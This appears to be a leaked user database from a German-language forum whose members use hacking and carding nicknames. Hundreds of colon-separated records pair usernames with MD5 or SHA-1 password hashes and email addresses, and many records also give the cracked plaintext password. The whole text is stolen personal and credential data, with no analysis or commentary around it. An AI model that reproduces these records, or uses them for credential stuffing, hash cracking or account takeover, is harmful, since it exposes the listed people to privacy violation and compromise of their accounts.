+sollymore:72fa40d0288a279583a09bbe52097648::hackerg95@yahoo.com +Opium:f7ff4927e87692d6bf369d0db30bdcff::opiumdroge@gulli.com +MRKN1C:06faf63aaf236f8dd2a1bc49a8926587a5c74236:422646:marko_900@hotmail.com +EpicFiscH:0d2ce093f47ce2f6a9bae4bdd4bcf819b7983dab::Frank_Forster@gmx.de +ushh87:266f87e3c4c54735d3a8275e9c7be612cd712b1b::soerensen.u@hotmail.de +puridee:6a3f48dab927abf85107deb19e4cd3c6::grafikhelp@yahoo.de +Klips:ffc998266360e600848c4c134bb5ae83::Klips@techlarocca.de +weednegers:5291e6f2bf3817e13049df67f2ae621e::huperle3@hotmail.com +Kanii:c53207b0ea2d15a410f0e5dd646a1fe0ccec57a8::j.halbleib@live.de +darkenemy:94a132946b7ada1a5e70004369ac919d::MSkrodzki@online.de +Crypton:af85bec44b431c814a38ffd7f1d177d9::Stefan@pic-share.us +Elcid:8c9bc0a7d39c6acf88186f474d5bc878557c29d8:vvvv:Lukas.sauber@polizei.bz +oldman785:26e6b8c84a712735c7c6a1dbe22f041c::oldman785@gmail.com +Saturn:3e5bbdf7a80a1751ee7deaa01f8b4911::west@arcor.de +Dream:21cc2f013a21fd913667da53c13a2d43::crimenetwokrz@gmx.de +Scooby_Doo:8b8395f046d42347f0bfc4950a9daa922749d65f:1qayxsw2:jajajaja@lol.de +luaxuan91:48d91a4c8418318750718a879f8216d4::luaxuan91@yahoo.com +Shadowgamer:e2573c837259d4721df43e18b4228e7f27c5eca1:hitman:admin@shadowgamer.de +FabeLz:85a50c159ae903f00f3934b84dd5e477e40bb3ce:sergej14:xxsubaruxx@live.de +Acer187:cacd1ced1d90d2030fb911ba9bdea9e7::jojo@msn.com +deadLef1:853a1bb79314e6fcab97c3531f7d9453::juppsteiner@web.de +GL0B0S:00e9738d297c39ab494cb6c9d151f72a::ddl@ddl.cx +1337GMBH:4a73ebfee4812fe7b4ef1da8e60fec4b::sagichnicht@yahoo.de +hammerhart:b2d8d8ad27e1d219619528b0f9c31d5144d332cb:simpsons:uebelstlow@web.de +Assassine:d0d5201f54639411da51eb20ec49cef9::vendetta1@live.de +weep:897ef2c88d9893554ad36022adfeec8bf1aa0c43::vkm_maschine@hotmail.com +Just4Fun:08d8b8f9f25745098926765e060cc081::geduxxas@gmail.com +jnst:e035c8f0aff71aa54535affa4cbb38875ae803a1:jonas1234:jns.t@hotmail.de +Makaveli27:5ece25279a5458c99ecf4d7c2c5d1ca257ac1b1a::michael27@mail.3dl.am +elfenan:0e93734b2d316bd9e1b8a26b3dec8da8::dark0zone@gmail.com +Australia:2afb5b4f91e49bebaf76ba8eaa0e882c::aus@tern.tld +Tinitus:50fb62724db93981be3aa79a513e125c::tinitus@europa.eu +CPU:d059c6328fca5c27ff21b50ac01810a4::on.board@live.de +Unlimited:92646c8f2728027e2a4b17472b17e99a::DanieleDS@web.de +gladiator:254b8ef43a1364483c1f430cdfa16bac::hacking_gladiator@yahoo.com +Schnappur:f8bbc243c706e542583a19028a8107eb::671445@yahoo.de +Apekw_:248740ed0235039190ab268860bbe805caaa1a40:halsmaul:loudlyxd@gmail.com +Carder:d8e17abdf80ea664295b011a23049975::yarakblack@gmx.de +twenty:7ab6f9d151ed5486754d534cb309ea78::twentysix@gulli.de +Triple:d8c3632ad5b9a23fa7a0febf4bd07c12cd7c445b::triplebaze@live.de +xtj3000:17955c995ea77a901a31d184c74058cf::benniHS@gmail.com +Berku:753057eddabf49ac21e6da981f032cb9::Splizzer@live.de +Ex0r:88d070f2511c3044e1311bbffb5df31620c909a0:nocash:exor@hushmail.com +Silence:e8b0de017c66ad3f73bd7b902e43df76::ftw700@web.de +harsu:f683801b4d4cf3ea393b5551d75c30b5::asklfal@web.de +Arma:b5788a7beb0f3f1060f37e09a1c4fceff7b79406::arma@hush.ai +GoldRock:02abfd80c30665f5d883ecc9008299e4a5d71286::the_gold_rock@hotmail.com +M!NDFREAK:a081e089d62ed051c70e9d06e6a0297c::m1ndfreak@gmx.de +nofuture:d263545c2d0217fb219d4c24ff6e3be1::ebrar_1993@hotmail.de +epic:b3fa2f8bed33d6b4d1ae10e3e2906f9a3a7b4828::epic12@cust.in +DerNetteMann:d9ce393725fff51b19cca471c84239a5::nicksteamacc1@gmx.de +cryten:8da7f6a76d6a84385f6f72484b59a698a76f7f32:tobias123:tobistyler@hotmail.com +sadmd88:177409462d558a9daf8db83a00e1dead::batmn39@gmail.com +Lilu:08b669a978df2c5e513090edb4c5cec5::qwdownloads@gmx.de +xmix:b8c0ffdd80f76473905bc07a49f743638063cf00:dukommsthiernetrein:playa-musa@alice-dsl.net +M4L!BU:5283452a6d5bf3991d07f5be38015236::Malibu1337@web.de +Dreihaar:83ad62f372fefd22bb15ba087ce41c19::Dreihaar@live.de +soxtexo:f3ec9e92b344f7be638082daf85e73c360de49e7:fcaugsburg07:soxtexo@googlemail.com +Hax:d6901682be05ad78164a4c9b1305a54b::haxoronline@web.de +Paysafe:2b8afa7596066a97a5037f18c9e782f2::n@n.de +hami:72729c294d01848aee7cff2788b5e08053b9e7a2::zidane_94@hormail.de +Dero:104acf9b96c712b9675255a1a3446f39::dj_sir_dark@hotmail.de +auto6matik:2362688102e3d7395657569dc30deb54::ggghhhx3@gmx.de +No:bd557075488d4cf22a1ad8c64b45639d::q@123.de +Al_Capone77:27981b3daff4bde0b456bef4ab943252::al_capone77@gmx.de +DoLLaZ:da633b67949c06becb201bb6d52cd9c8::FrankoItaliano@web.de +MoVo:d482b3a7686ed01887d6957f7268ad1ea6ac37f9::aycema@gmx.de +kontoazo:1570d0db46ee1fbcdd5cb0c474c6aecd::kontoazo@mail.3dl.am +.Blume:4dcc02da704b4a8243ad53ad52e5718f1c2a75f9::metaghost@web.de +cc.free:fd90dff142c41f9a5d3679285df43ab4::tofanhard@hotmail.de +Randy:3e340bad30ba576f51a6faf93d113b5f::petrawetzel6@web.de +K3Y:0aed2b14dfcf114e7c226a93e8508e5c09599ea2:123456:k3y@usa.com +hacker1337:6df65c75009aa5e04e05d3aa2ec541cb16a4b830::fz100807@live.de +Cooperhead:68836bafd5c0e2d5af480c3d7efa3e4d::robinwitte@gmx.net +Win:8e5d7aee02139e3b919513c111eabaee::yo@yo.de +Baruth:58644f192b8cd45160db7b97e6f3fd25::b190694@uggsrock.com +x110:5f8e092d5b474a1550bdacc229c96390::Xuan_huy@web.de +mamali:20d51bdc4c8d13415bedeac27383c4b2::tmontana2@gmx.de +kaliber:eb663884aaa36c91f1da4d3226408003::kaliber@hush.com +bodylab:10b6f3356b71a71ecf9c242edd8886ab::bodylab@sofort-mail.de +BlackJack:6ff6e1db7dd2d943b2bc286fb3e5e9e0::xXSkyLynxXx@googlemail.com +phoks:6430059e5ca4fe2ac8f74907ee6cce79::felix.fey89@web.de +ernesto2:df256c39b6060a105bf5ffa2232bd23a::ernesto2@mailinator.com +X3N0N:e47b6e7d0853af2340bd0e8c62f0aad9::mysql.encrypt@googlemail.com +lassmalranda:c9f9c2426986bb2caddb3a3acd5f8bed::lassmalranda@safe-mail.net +Arcangelo:5069e853b7b2e8808a92707ae2d48dc818b3dcae:03021986:warcraft4all@web.de +felixasmith:806e12234bcd3d1954689c481b05cdb2::felixasmith@yahoo.com +b3g1n3R:1aac20aebd1be477f6ff5988dfb0233add85545a::b3g1n3R@fahr-zur-hoelle.org +Hamada:5087b25e358d3ad7412c6e4eb2c8ae8f::email235622@20minutemail.com +ich bin der co:602ec0ecb5e46858e69860f24b0181d0::sergejkoschkin@web.de +ST34L:15ec23226bf6499dc070f0c165983c6a::crashzero93@web.de +TheOne:ba8d35c161741625b4ea80e4f85c8dae::b199179@uggsrock.com +laylow:b6420b554b37c9d3f53103c783ac3c59::lay_low88@web.de +Hero:f68bece81147b7dabcb29f9c4ec09194::kollg@gmx.de +carding:a4f5d644494e1f6eac12504c9cf0010d::ardablack@gmx.de +zico:144d1862de4facc081b2d0a6d7de3bfa::yarakmasiv@hotmail.de +thefake:deea2bee8827da65538c99128c10d52c::yarakhans@hotmail.de +fataL:059911eb7a61491e692106c297001bc8b74b9358::fatal3x@live.de +kingzaza:8a0c28d0d28425b19a6f618b3913dd0b44f743ea::salvo_ceker@hotmail.de +Ansem:ced9a144de9ca17f4665372ff10c23ef::ansem1337@googlemail.com +Tollik:9a1bad147d4e21775b5bf7e879d9c1a5::anatoli_17@yahoo.de +Pumpkin:abd5f76098739925dd4cdbe3fddf7050::dewfe@web.de +BabyMilo:1e705b07ca8ea2399eac674de020b14a::vodafone1199@gmx.de +Blu:46633113b9e607023c7fa9d78d80fdd7::abotit@web.de +Kingpin:333e2e14d670a640118b8fea217fc53ce344c04c::x1iv6p1iv@safe-mail.net +nichtdort:de2ac86dcbc4176e66b06bcca1924935::nichtdort@hotmail.de +Scorp:479d9d631601420522bebc4781bbfa170402381a:12qw12:scorp4ever2000@yahoo.de +jack90:6aa50ca703c4d3c785fcf4492f35f1d3::hamster-henning@web.de +Dr. Kaiser:4d6a735b60e1fad4fff0a8815717b92db94a744c::RusSch1@web.de +Misa:0324a138e635ed68db5e687bc10361374c1301d2:lol12345:amane_misa@live.de +BandidoSupp:a5db60059ba282f882bbc28e17f8e825168f47c7::alphatier@safe-mail.net +Deodorant:ac995ecefa0241d53cddcb50c2908520::b222812@uggsrock.com +mraaa:ee96bed4230bf03cc201d55e8bcf612b::mraaa@freenet.de +_HeUtE_neU_:0890a43691972b37537c44efbc2f26c1::Delhonda@arcor.de +Imun:d3b5788ce2a83aab2d2b3fea1912d533::c@cc.de +7x375:7351c9e416aa6e384edd69ad7d4bc33f72f8e4c3::7x375@hush.ai +B0LIKA:029aa57d642e22dfec34d674d778c26527212366::b0lika@web.de +Aspire-one:a46b962ebdb02f57c3d2252d525b7283::huta@live.de +eta-dimon:17aacbec3e5316b4139800385c7b070a325e792e:natalia:reichert-international@web.de +Half-Life:972a4b5c96ed640cd4872fb63542ce48bd9ec478:bleistift:anno1701crack@web.de +weizen01:bb387ae768c9b61885345fe717e2391ad2179309::florii@kuh.mu +Phine:58dc236236b2101d168a2980d38fd34f3c6e66de:060641410:shadow60@live.de +ozzY:7f5d719d674b0f8a765c352539176838d207638e:salak.12:ozzyrw@hotmail.de +ProGamer:30857195b3ef6d121b1b025b41c7e41b::newprogamer65@web.de +flashback:53685add2f5ea3a74387c0df96c915bf23588d3a::lemonium@ymail.com +Amazing:f944ba7810cc640281137f884ac74627::aggro@web.de +Django:13e95bb91e5b0e631b2ffeda650ff420a9723f9c::Django606@gmx.de +gattex:c604d3a0bcc90c2d6bf2d80adf59086e::ill781@gmx.de +Kokain:6301e7ece4002ec5884a6cb50b333cd0::newjork@bizzness.am +Tab:0dfbc99568b7be75084810963f4d756e::youknow@hotmail.de +lcf11:b39ff86f02ff354b006b4f014b2722ec53eb993c::lzf@safe-mail.net +copyamp;paste:da031ab15f0efbf4fa1e829df6a84190::herrm1977@yahoo.de +hades:20987f437d55950d4add88c1ec4f842f::haden@live.de +GameBars:8a4607daa5995ed9148ab688ed3b1105::gamebars@web.de +wurstbrot:6c0c9f17eb0452c41277098ca733d38e835a5041::no_oj@web.de +n3Xtlvl:b2520cac9d82abbfef8b6d0326b84828::n3Xtlvl@mail.ru +Ag3nt:d47ef6214471d7252da818acb1d989400a115600::gangsta_sam_007@hotmail.de +PS_Moppel:7cd174d6a85600698cd369c9abd968a1::moppel@wampe.de +alendelon:59eb47be1d51ad7acc9c2152852be532fbc1a9b3::bratwaikolzo@web.de +THE DOGFATHER:8ee65f44a44a9caa90ea783e9358e9a9d99e3f92:service:hvhgvz@dfgfd.com +EssAH:7c46230571f8d1d0455036a40bf88f81::dennis-leszczynski@gmx.net +freakm:88208ae42738f2c59aebf2a2d4756d3f::malexfreak@mail.ru +Omnibus:baf5c5cc6d410f239379040e6deb0652::petshaw@web.de +sinner93:f323e197184681081d9d7c0a9190c26f::d.sin@gmx.de +Undergr0und:dab2a62e52814dc95f3b6b0e68dca7f8b5a70c92:qwerfdsa:Undergr0und@warez.tc +Staubsauger:b35ee549f34ff806459dce7fd91e8e30::ghdhgdhgf@web.de +Monday:e48aca1d52ec2e49603ce287bea2b9fb::done4@gulli.de +Rumba:713bccb71f53ff5444ca5fdb707a26f4::rumbq@gxz.de +F1reblade:f1cacea49cd2107f1bb10af469347f76::mimi@web.de +Nexus:ae9656f6188ac706d0c894a70977fb1b1117f39a:123456:Nexus@spam.la +wuz:0078919f4159dccfb71e6099acbc3f97556927a7::ikeeh@bk.ru +Tasty:050c98da1bef6e333714a145b79e6751::tasty@0815.ru +stick:44094ad86efc53b065286d4193985332::sdfasd@sfgf.de +Mano123:47c2d5d83b444fecdc874b668dadf9e6::mano1232@web.de +lalaxD:56a2c2896e045d28e74553e3ea2497bf::fatalx@hotmail.de +inexcussus:b2e8531dc9c86e5b8f144bb70a8087f7::inexcussus@safe-mail.net +Diam:50bf1a7d907ceecc6cc32b395a556c37b3958200::Horst.Gimp@web.de +aRRAy:a79cc47f8c1bf3f8f6c947a56a38c4e9::ArrAy.A@web.de +1r3c0n:5fcdf46effb406340ae57a4b8c3ba5a9::kommt-noch@gmx.de +blade321:398111202cdd62b9131d0a021c3293bc::blade@spambog.com +Jacke:16163b8517c95ad77d48d82fcd43dc74::ilike@hotmail.de +aescel:d986ebcc76c51ef1bc84b9e54f2ba4b9::aescel@freenet.de +xelni:db220ec29065f0bcb528f5a333d3a199c2fc85c3:1qwertzu:the-passion2009@hotmail.de +Z3ro.ru:0a78e66d0676854c41dc521f0d225009040ba4da:13371337:z3ro@spam.la +pikas:4791bc1053855cab805cc0ff1cc54848::pikas@spambog.com +EBM:e1b9646676d43dff21f58bdb841db089::7mail.jaro@googlemail.com +mpcool:9f75fc4ae57f31a4c048170e0cbc3dd181a70601:jas9pebu4:mpcool@web.de +gfx-.-:aa4e750c43a6de4a0166a8e06bfe66e1::gfx-.-@hotmail.de +radiostart:57d6c52dd362537280ddbe68cbf1f6156ce72b38:theissen:radiostart@web.de +Bill:41b7fc2dd17933a608eccfa2cff6d627::billy@no.de +SceneHack:4e2b96bd78da32a5ca285decb2a3012b::scene-hack@gmx.de +sUpReM3:8f5082928e3fdfe5fbbcc2cc25eee65f::sUpReM3@mail.3dl.am +s0ny:80a9ea085d5afe897881ad17d41b75f7::s0ny@s0ny.to +kingk:7fef2d3bad574d41216a900945a065ef::fetti@moppel.de +tux:60679ce4bc84b9f991b357a9ed8c3890::no@g.com +Mylo:e35991f5b1ed7b29baa5afb2f4cbb8f2::simon_kleine@yahoo.de +nTs:51914b14949e450da3a07b19b8ec36c0::nts@gmx.de +grimreaper:d0f0a7e3e6d5820deebef5a5a6d1702b::xerxesxyz@aol.com +Cru$h3r:36c7a7781aecb71c950084ece1607bb9::Crush3r72@gmx.net +Koksi:c65a26a5d1234514f571dc3951cb6aa0c6a05cf4:fickdich:koksi@0815.ru +Packstati:640e0a689d89394fcab436df09f2fc78::looooool@trasmail.com +westside:c2b5367f04e2dc993717eeadc0620f20::wstarloco@gmx.net +alix07fr:f04c668cbac0c6c2abb6548170fcf15f::alix07fr@gmail.com +wurstman:b1bce657cdda80a1e30c231b594585bfbb7276ed:123456:sk.noiz@googlemail.com +FAM0US:acac65b2bf8ae78e619c59c849cf86c5::laswat@web.de +Idiotenhof:807564707c7a0f94efcc150feb366910::Idiotenhof@yahoo.de +ero19:16ea3c3e90b69f351ca40f0901edad4d::killah36ertus61@hotmail.com +PwneR:bd5cd748e312efcfe980864d22396fc9::Daiimon_x3@hotmail.de +enzostrato:38662d6a6189951fffc2cb1e44c5ce9c::novathic@fastmail.fm +bulle:53d801d6532506c3148910caae794e8c::petermax2009@live.de +zer0:d9afe7ff4c3b5b23d635bb47d186ba19::zer02009@hotmail.de +Shisha1337:e311cb8527f291d4f86626d00e7e7b45::markmustermann2@web.de +K1!!3R:541eee94e63a1b74295c00f5d67ec06d2e84d440:Killer7:y4h0m13@live.de +Sqilloah:8105ebf4cd95b72c83910cec502282a4::ad@sa.de +makker:71fbdfe369280213b7d6ae691e0dd1b9::uiwer@web.de +agonoize:9458ad9c2e748d837ced2a5f10b4b4683d2eb1aa::horrortrip@gmx.net +og-pascha:695171474681e8ad5be6db343c8c5ef6::og-pascha@hotmail.de +blutrausch:a3b7e218b3c2dd639a0818a4f68e8e7e::blurausch@freenet.de +grendel:b9b0ac17ed9e4d3996d431981ca7980d::Terminator1337@mail.3dl.am +Zappelfreak:060c6dfdbe625233a00f57fa79144ca9::zappelfreak@mail.3dl.am +CyberGT:a42fed5a33ca6836f55dc060a233a591e5d1ac6c::Hacker68Hacker@googlemail.com +panzerjunge:44811d0e038baa771dc370a543bf4e91e36eadca::steam.olii@web.de +WelleErdball:8b3b239fcf05152b8ead6362fd2ff127c1f15dc3::juli814@web.de +SurfArab:1e5f301d4570fe6f2395bc3d51300bcb5a8001b9:15051988:tyque@web.de +Schwarze Welle:39c17d5ba27a6f096b81346484721894::SchwarzeWelle@gmx.de +AccessDenied:162d78931a5c3efee0f56e2613a10146::AccessDenied@gmx.de +Lifehater:fb82024bcd0555af38c406bca1d39668b83bdd7c:nick88nick:nick-staemme@web.de +3roticNightmaR:d9577b6e757e094912d0c7002f6ca4da::fvp92@gmx.de +FridayDie:f4785d9076272213df900cd0ef8404c8d95208af::FridayDie@gmx.de +SelfPainMan:caa9269bb3fc88bb434b17c3f2afd4585efa8da0:mama1234:SelfPainMan@gmx.de +Accuface:da08c8e32baa545bcaa0ae45ab06c663::Accuface@freenet.de +weiberheld:f1dbaa8d83c92f1f39defdd06fd2b96e::edip123@msn.com +C4RD3T:3daf11f1ca9949bbc6de7b8f4d264fd9::b381636@uggsrock.com +checker123:8bb0893fe98d831686f052da59be6dee::hundesohn@web.de +X-Source:32b52e014846bb0da9f788aeb5769228c92eafca::X-Source2k9@hotmail.com +cHanoa:ef0147a97a9da7f63bcce0173012a1d47b1f8269:aggrogold:keks12345@mail.3dl.am +n0f3ar:b9df4de4f5c20f6c34f4d5d91937437d::daniel.laufer@gmx.de +M1ghty DuQQ:d0cac5ac0f0fe4b4ab1cb869c9116013::mighty.duqq@hushmail.com +phosphoros88:1e75ade66cc6693522d4139d28645c0e::phosphoros88@gmx.de +Slumski:a198da29578e09b5ba6572c557c3b185ff3e6fcc::hundbloed@gmail.com +BeN 0wnZ U:61c3ffe65017428efa18c970240b69453990877d:bennyewa:blood_benny@hotmail.com +shadowman:732efda3541098f8abd82112b90e99f1::wulfi91@web.de +Wombi:9604debe70f75600cd3118dac455c801fd673370::robet.am-start@gmx.de +Meno:fe54a0d305b78bdb7c940064c6bb6eab::gockel09@web.de +Musch:437fb15354888310d331ee81697f7716::gfhgfhgfj@web.de +jinnai:c1d0a3ecf31b68a19aec72a172a9ec6a::spliffmaster2@yahoo.com +lebkuchen:5713ae730271dfc94c8ec20839f95e8e::bs@web.de +olanga:d06a5654175dc8e15a98c9b413675ddefcec600c:baum:derik.s@gmx.de +KoK:ceac49d7b318e339f30820fb209d23eb92389620:hgbyme:kok24@0815.ru +Pat_16:e73d4146d5722ce7158c3093edb2275b40b6b6c3:Hofmann:pat_16@gmx.at +MaSarie:fc64133244ecd945fba8d6aabfccc03aedc761b8::CH_iKO@ymail.com +Ingolfus:aa9fd100c8cae78d27fe29ddb769a011::ichbindieter@imails.info +sinh_cvv2_khan:6ee4441c99f15129aac4b11f809b2f4c::su_cvv2_khan@yahoo.com +Congo:8c17196ba3513f30accba9f9a0ebec55::blitzer@hotmail.de +Arkasha:acdf1fda6f1a3487b056a049b98b0624::admirall007@googlemail.com +Lanbiz:4f1ab5aa94136f5899cdfde8cde44ba9::lanbiz@bka.to +ulaaan:e35e5a330549207d9771eaeac5e2f83c::b460703@uggsrock.com +abcdefg:70fdb7487e5733553123dc1d691633ddc642f36a::a4109513@owlpic.com +B4d-B0y:c7d6b0bcea9a764f2c9c67619baec76f::B4d-B0y@live.de +sonic4:4db5bfaf50d2bfaa88514b3d2466e9d0ce72c55a::sonic4@inbox.com +powerup:7398aff271601ef213f90780859fc580::blub@web.de +Neopolan:29f1ff9814e0c4d7ef582acdc4b1ec4f::Ajumy@gmx.de +Brummbaer:a79597362084e115fa2459e54e3327e346ca8efc:123456abc:brummbaer@safe-mail.net +Fushigi:bd69af00a6de5bfd16029f02b7a275c7b653c25a::shana649@mail.com +Quatro:25a39eed3be30c1dde460a7692d1df11::deltay@gmx.de +Hartz-fear:6b9f58c1d40aef7edca9e812e62b64b7::glikglik@web.de +LBEST:3e1381621ad0b7b01e124f3eb92ec7ca::lbest@bk.ru +Gotcha:bb02b4f107d66750c6885033280cb03afdc9d2ce::freedown3@gmx.de +Chef Chelios:3e284b1fd4204aa6e14360f7085fb5c8ba801a9e:molopolo:support.fruchtis123@live.de +Ameisenbaer:d1f813b88840705c48102ffce67e4fe126963b09:Hallo123:Acceus1@trash2009.com +D4rKnesS-W0lf:5fc4ebe645c5aadfc0aeb560280783e9::D4rKnesS-W0lf@live.de +ebx:9639e7e685df08a10b65596306b5e7bd3f858808::maffm0n@rocketmail.com +Squeze:7fc776b9165f146c4782cec832ba73099728f32e:ps1234:psen@hotmail.com +N1ghtm4r3:c3319f9ad30cf2f209fbd9449e3d5cd7f275e47c:123456:naaa@hotmail.de +Darthlord:27de1a3ac67eb7ad8ca0c71543f4a96b::kk@gmx.de +PS4ME:063ea038c48dd6bab13cb07926c48ebe::se@aldi.de +SzeneBibel:300583ec6b3af7feb2203e656d89ee04::gott@hotmail.de +felix:b611c53bc3901f0f9211c52eeea0eb44::ninaneb@web.de +Ankashi:5f8c308e0256f16d46d2219c323413cb14eda0c0::r0t4ti0n@live.de +Histance:40944c6e00d93f654ecd2a3937168acf::prettty@gmx.de +GunN:7c5caf41956b0d794b65663c7d8c0d7a9bc7d302:asdasD11:pro-hack@web.de +Marru:81afc3a53699bbe22ef25035686e4847ee2a88e2:keinplan:justufar@googlemail.com +jackson:88eada734658db20b3f6579fea01006c::jiletci.pala@hotmail.de +Murderbass:a8accb536392007f06011e345a9b0b31::sloppy@hotmail.de +deaken:c7132c41a0add650259b66f9900e2d408393b43f:123123123:trojaa2@gmail.com +dtrip:6d7a6f9e802da6bf6f44dc29d52f8a8d::d.trip@mail.ru +n0R:92fba0bf2288b07f02a8bec2aaa21c9accd09a35:deluxe:x0r3@bk.ru +BigBrain:bc3f7b94c7e8bcfaba28a219435a7ad7::hastedi@gmx.de +ikomanis:dd286a1eb28c0f86d905e85b910fea8f::kai28@gmx.de +alias:9bdf288094792426cbb102e0fca7aa25e42ec710::n0ali4s@googlemail.com +TombolA:a498f02ff01e1f18e0288875f4bb9e33b94c682e::tombolaa@gmx.de +Syrus:41cc7d74cbac44c56ab43de5d6468e1c::Morph397@hotmail.com +KRAT8S:0292299ea42a94b19ba8adfffe77f7b4::chino25@t-online.de +Wolfgang:2531a19febb39c83ec5fac123baaecc66ee218c6:ficken123:mafacka@safe-mail.net +letsgo:01c8f15a54764a792538fbc7860e5fc9d44334c0::t3tra21@live.de +Psysis:6e070fba2ddda163b84a31eae98af82d::psysis@gmx.de +rostas:2bcc95b21004b696f11e97252dac9416::rostas@live.de +BlackMatrix:6ed41c6dce837db4b1f7aae0874c7ed6c4fe92e6::darkmage2009@gmail.com +mandy:4a4dbd31eab5ce3dd3626901fa9bf053dab48c89:ut2007:zauberskill@googlemail.com +str0ker:6e9fc8c34415451e95e73840b5966533bc828d0a::iniced@googlemail.com +eroo19:f06df4e5e45ad905d92701c286a5f134::craziih-terror@live.de +DavidGUetta:143b4f4e6aacf666e45fee8c8895b21f::dwef@yahoo.de +vengad0r:ed4d575cefda6ed377fda39b4ee76e20c11b41d9::vengad0r@live.com +ssh-socks:f150007d0338fa7be7639fbb38b9aadf52f24ee3:werner155:socks5@bk.ru +Yamyam:ef2a2632cc163bd823a443e612967247::yamyamyam22@ymail.com +r4ptix:ce500988b7a4b9602831080018af561c::r4ptix@live.de +gsyazoo:121731054f6d9576039a228665e2260e::gsyazoo@yahoo.com +uimvke89:50693c815174bfa70042b91f30bd7dd8::bkcv733@gmail.com +Throx:c75ec9922b5630fae22802c2346f2e2d35bc8ee7:killer1:exton@hotmail.de +IlPadrino:1f935ccc7b6fbbd8570dac70d54b291f6a703222:paco91:spicker.riccardo@gmail.com +comodore:7e74f409629f1b750efb279e956e1c0d::skilled_jt@web.de +Milano:5f451b235d92db29a9e9148ffb943d7d::milanoug@yahoo.de +mch2:89b88fca41c41645cfee276817f863c6::drkadf@asdkf.de +cl_b0b:55d4143afc66ab216801ea3e8e91ff15c5bc4017:typh00n:n0xe1@web.de +cunit156:2af85564a514a66ba4acb76556cd5e83c103c000::keine.ahnung156@web.de +tubac:1b218f712fe1adec046f81e6f2a07dc7::tuabac85@gmail.com +JBG31:a359ccca7c684dd6aec2dbaf44727135a1022f07::Faridgbg@gmx.de +AllStar:19493b1739a6679ef38f5b098b22cee7::allstar@carders.in +_crank_:37819f8e59b2cb334d6924cb5857eaab::dave.warkus@web.de +Invaderzim:13fac6f560c1b93cd06087a5495ce830::hopfen11@web.de +rapter:4cb9aae15deff8f0128b25857268046d045d6698:hallo93:Rapter174@yahoo.de +pille191:1dc81d15966068f536b8864a13ec2e1b::nichtmehrpillesondern-j-p@gmx.de +Redlight:8ad084735421542fa68dfd87a654cee062c5ccb9::g0dlike@live.de +goLd:50ff59c26b9043efedcdad4327045e9a::speed2@web.de +payme:5b3928cd8e0944b5a1c6f9952cb8f8bd::heinzelmann707@web.de +onlyforyou:73088bc3361deea7cb7aa6c04bc7c048c860fea0::ceyz@mail.3dl.am +Platinum:1582b3cdde421791c21b0f9537480ce98cff9efe:fuckitnow:brakejakesnake@googlemail.com +Europium:9060b608fef55456675f395e2f4c329058f938c5::lory@mymail.de +Fanta2k9:f6b0566c9aec764f852308fda3a3ebd9::a.erkelenz@yahoo.de +Ch40s:d1df4f8b6ad4124277901d212fd46096665deed6:mirrorsedge:ch40s1@hotmail.de +Du_gLaS:ac74eff5eb8f7d0b2409c3d6354f2292::flashes@gmx.net +MasterXD:be40ef0f3af2914155bdaca41038ca335a85ef57::ke.martin@hotmail.de +Blockbuster:f54e719a3a67c49aeab81003fc907bbc6d90612d:ticket123:nitro.bla@web.de +daten444:3123d6e311ee09c2352496aafd9ca6ac73d1e7e1::lolla21@gmx.de +Fusel:af0817f3e2f7fd35118771502d5b103bb9c5f43c:simpsons:fuselbrain@googlemail.com +Sweet_Butcher:2e8c43f110c9f3bc2d71693c7f3ccdf63267f396:fabian2406:sweet_butcher@web.de +momo5102:52dec6ccead59a85014f77c06fd62758::thegains51@gmail.com +st0re:b6a70122415c07f7b8cfe031dab7ab0e::t0re@mail.3dl.am +Cyb0rg:20f50f96ee846ddd0391755e92b412f049eeff11:opferopfer:noluckbutskill@web.de +Hunt3r:395fb1687c8526ae425078904d328323::hunt3r@live.de +Hack:7711ce23a2e0d2ccfd81f83146b5a658::Carders1@web.de +gn0m3:aec4552683b1d5e0811df989a190978b23ba0422:weloveit:gn0m3@hush.ai +Paysafecard:d3a53882d6177f47f6d7c02ff5c3c705491fe1a3::paysafecard@spoofmail.de +kalshnkof:e2c5360a64133281ce8134a83fa50c07::kalshnkof@ymail.com +KRON0S:d30d9064fb5e3774f94518da24856164ff5b08e2:password:jonathan.wald@gmx.net +Froggy:a3f3683048f8bdf38c47489a69670875:: +l0wbird:2a3123df858daac24a7017e47218b030:: +Juri:d5904857d277bbe301da5ca4f450399513d7b4e6:: +Luigi100:72a63ad71a357e7080f1b611a0162ae4d89a579a:putin123: +MPC500:c9a89663faae1a9760a750a8ec957ed7d6deb7d6:yeah123: +Icecold:582e3f035355f557841d4805cc891b98:: +dariusz:c839a89afcca55395564bd536ac1c1878bcbd640:carry: +cutsman:a7c2170962684251134f8401ca4fbecdc5c22ffd::cutsman@ro.ru +Sylvester414:87a69c34eb5890ec70be343cf9995ae3b682cb1b::kuhbesamer@gmail.com +ant3:b82215502fbb93a37a3e5ab1fd1195e05ad484a5:dinamo123: +Pa!mon:5a862b89ba0091ba092b75566043b168::keKs@mail.3dl.am +xlf0r:f8aaf4829ae123c97d6a6c1bbdbdf72e::xlf0r@web.de +RipperWatch:34ee0156d2b7e49d5702e0ba318ae4a6:: +unnex:d075c57244c0a2ddfadec584001c504af2cab52b:bubu1818:schattendeatroth@web.de +Mixalsky:71671b5c6c8e3b876181338c0c84b979::lordofwar1488@hotmail.de +Cobega:a309278aede36d5ef5ff46918a5ba23c631eea7d:cap1200cu:youdeface@web.de +Swace:2c5eb567f9f1fa924030d4bcbe5a53bcdb9593fd:changeme123:changemelolol@me.com +mxxshadow:b319a9dc9a4655625843489cbb07683ba53454a5:michelle:mx518shadow@hotmail.de +roxx:61bfb45ce5bae8e86d9f5482dc43d3ab:: +Crasch:e57640a82662e3b64893ff61241f7bbc52a029c8:: +bozkurt:a99e6c36ff4c51eae128b809c06ef486dbb238d4:gecko: +p4t3:2b00e6dd5cd90ee8d1b39d17bcc5e958:: +raiden955:9fd759833f4c2edf21dda6b7b942c1390e098366:robin1990:cathar160@hotmail.com +Gamer#1:2cd788355238bd845b552b3f8d95ccc85c1612c9:Speedy1991:Marcofusion@web.de +Clearshape:7da425214dff909163fb7b8f9bb5f1fa94629f79::peterprimel@gmx.de +potatokiller:b1b293ac28650065e48fe6f941d7c446b44f863d::hteam@live.de +X0064X:2e14d197934ea776a4bd1f7ef0b6d0dc::X0064X@web.de +x3mnik:955949b376ef6e910c55e294c8d76d3d:: +bombala77:dcf987cfbc9178ac413e8c7c687f621f::bombala77@yahoo.de +Thug4Life:2d536fe1ffc01f51201afa54fd6cb178:: +Verde:f09b48730a6e8cbcbd42c88ded39215d:: 